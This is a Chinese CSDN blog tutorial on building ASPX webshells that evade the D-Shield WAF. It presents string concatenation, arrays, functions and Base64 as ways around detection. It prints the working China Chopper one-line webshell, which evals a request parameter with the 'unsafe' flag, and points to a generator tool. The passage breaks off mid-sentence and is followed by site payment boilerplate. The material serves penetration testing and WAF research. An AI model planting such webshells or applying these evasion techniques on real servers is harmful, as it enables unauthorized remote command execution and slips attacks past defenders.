无限免杀D盾脚本之aspx ——yzddMr6

本文介绍了如何针对ASP.NET Web应用程序构造免杀的WebShell,重点讨论了Jscript的使用、字符串拼接、数组声明、函数及BASE64编码在免杀中的应用。通过这些技巧,可以有效地绕过WAF的检测,实现ASPx的免杀。作者分享了一个生成免杀ASPx webshell的脚本,托管在GitHub的webshell_venom项目中。
摘要由CSDN通过智能技术生成

前言

自己曾经写过一篇文章:利用随机异或无限免杀某盾

php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章.

因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀

0x01 主要方法

字符串拼接
函数
数组
Base64编码

0x02 了解aspx一句话

Aspx的一句话一般是使用Jscript语言实现

看看原本的菜刀aspx一句话

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

其实与php的类似
Eval函数将字符串当做代码执行
不同的是在Jscript中为了安全起见必须使用unsafe参数,才可以使其具有对操作系统操作的功能

Request.Item["pass"] 的pass就是接受的参数 类似于php的$_POST[“pass”]

Jscript基本用法

Function xxx(){}//声明一个函数

字符串拼接

Var a =’a’+’b’;//a=’ab’;
Var a= ‘\x61’; //a=’a’;

数组声明

Var a=’abc’;
Var b=a(0);//b=’a’;

作为免杀来说一般waf杀的都是unsafe这个参数,所以我们的免杀也将从这个参数下手

0x02 字符串拼接

经过测试,一般来说把’unsafe’这个字符串无论是十六进制拼接还是直接大小写拼接均

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值